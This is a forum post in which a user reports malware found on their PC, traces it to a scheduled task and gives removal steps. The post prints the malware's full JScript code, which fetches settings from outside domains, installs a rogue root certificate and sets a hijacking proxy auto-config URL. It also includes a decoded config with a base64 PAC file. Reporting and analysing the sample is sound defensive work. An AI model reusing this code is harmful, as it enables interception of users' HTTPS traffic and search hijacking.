Hey. I've been struggling with this problem for a while, and I think I just solved it. However, I assure that this malware was undetected by all the many tools I scanned my PC with, so it may require some review by, I don't know, the guys who write those tools.
Here we go: I noticed that Chrome getting closed and that cmd window that flashed happened always at 18:00, so searched in the task scheduler. Bingo:
Attachment 54678
(the first one, sorry for it being in Spanish)
The action for that task is the following:
Code:
C:\Windows\system32\wscript.exe //nologo //B //E:jscript "C:\Users\[me]\AppData\Roaming\Adobe Acrobat Pro DC\settings.ini"
Looking at that ini file, it was indeed a JS file badly disguised as INI. Stripped of all the comments, this are its contents:
Code:
var ns, no, re, rs, st, reg, pac;var ws = new ActiveXObject("Wscript.Shell");
var bs = new ActiveXObject("ADODB.Stream");
var xh = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
var tmp = ws.ExpandEnvironmentStrings("%TEMP%");
try {
ns = ws.Exec("nslookup -type=txt remotesettings1.mtmyoq.se");
no = ns.StdOut.ReadAll();
re = new RegExp('"(.*?)"');
rs = re.exec(no);
st = rs[1].split("|");
pac = st[0];
cer = st[1];
try {
reg = ws.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL");
} catch (e) {
}
if (reg != pac) {
ws.Run("taskkill /f /im iexplore.exe", 0, false);
ws.Run("taskkill /f /im chrome.exe", 0, false);
try {
xh.Open("GET", cer, false);
xh.Send();
bs.Type = 1;
bs.Open();
bs.Write(xh.ResponseBody);
bs.SaveToFile(tmp + "\\cert.cer", 2);
ws.Run("certutil -addstore -f -enterprise -user root " + tmp + "\\cert.cer", 0, false);
ws.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL", pac, "REG_SZ");
ws.RegWrite("HKEY_CURRENT_USER\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL", pac, "REG_SZ");
ws.RegWrite("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnableAutoProxyResultCache", 0, "REG_DWORD");
} catch (e$0) {
}
}
} catch (e$1) {
}
;
Pretty much the behavior we are seeing.
I can see that it also installs a certificate, probably to make work that fake google through https without raising errors. I can't tell much about the certificate since I am not very well up on the subject. What I can tell is that it was created by
Fiddler free web debugging proxy
, and that it shows on my installed certs as this:
Attachment 54680
Well yeah, do not trust.
Interestingly, there are several domains involved in the malware. The first one,
localhost.world from where that smelly proxy settings are pulled from, and
mtmyoq.se. This last one, when visited, contains a long string that, when base64 decoded, looks like this:
Code:
<Settings>
<Setting>
<ida>1122843206</ida>
<UpdateVer>6.1.7600.20003</UpdateVer>
<UpdateUrl></UpdateUrl>
<UpdateType>2</UpdateType>
<PacUrl>http://searchly.org/router.pac</PacUrl>
<PacFile>ZnVuY3Rpb24gRmluZFByb3h5Rm9yVVJMKHVybCwgaG9zdCkgeyBpZiAoc2hFeHBNYXRjaChob3N0LCAid3d3Lmdvb2dsZS4qIikpIHJldHVybiAiUFJPWFkgMTI3LjAuMC4xOjgwODAiOyAgcmV0dXJuICJESVJFQ1QiO30=</PacFile>
<OneIn>1</OneIn>
<RewriteFrom></RewriteFrom>
<RewriteTo></RewriteTo>
<DisableRewrite>0</DisableRewrite>
<Ping>1</Ping>
<RedirectType>0</RedirectType>
<Accounts>
<Account>
<RefUrl>http://www.digital4k.net/search.php?action=results&sid=</RefUrl>
<CX>009793234822822480237:wabrdd_t6e8</CX>
</Account>
</Accounts>
</Setting>
</Settings>
I couldn't tell what that part is but it involves more domains. What is clear is that this is obviously malware, probably an attemp of phising. And none of those domains or IPs are blocked by my security software (ESET Smart Security) or seem to be blacklisted anywhere. This is not ok.
Oh I almost forgot. To get rid of it, just delete the task, the .ini file, all the "DO_NOT_TRUST" certificates and revert the registry changes made. Ensure that there is not any proxy set.